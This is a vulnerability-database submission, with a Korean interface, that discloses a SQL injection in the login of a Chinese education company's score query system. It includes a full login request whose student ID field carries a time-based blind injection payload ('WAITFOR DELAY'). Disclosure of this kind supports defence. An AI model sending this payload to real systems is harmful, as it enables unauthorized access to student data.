제출 #222328: 陕西蝉鸣教育科技有限公司SQL injection exists in the score query system정보

제목 陕西蝉鸣教育科技有限公司SQL injection exists in the score query system
설명There is a time blind note in the user name of the system login payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTg3ODE2MzAxOGRkjs5lCbkPfYcmPBDFCeTbdJEDUE40z03ahnrD6Cn6U9Q=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAASwlrAzUjIPJemzPlKXfWadM+J3jsP5r3X1sSgLaohSXGGcPOO2LAX9axRe6vMQj2HauvzlgfhlZODHSoB63VpKjRseRNtrMZdX79HgkvCMlmNn6WVF7UoOCb7l36e19Zg=&stuIdCard=';WAITFOR DELAY '0:0:5'--&txtpwd=111&btnLoginStu=%E7%99%BB%E5%BD%95
원천⚠️ https://github.com/Echosssy/-SQL-injection-exists-in-the-score-query-system/blob/main/README.md
사용자
 Ting (UID 54907)
제출2023. 10. 18. PM 12:02 (3 연령 ago)
모더레이션2023. 10. 26. AM 07:44 (8 days later)
상태수락
VulDB 항목243593 [Shaanxi Chanming Education Technology Score Query System 5.0 stuIdCard SQL 주입]
포인트들20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!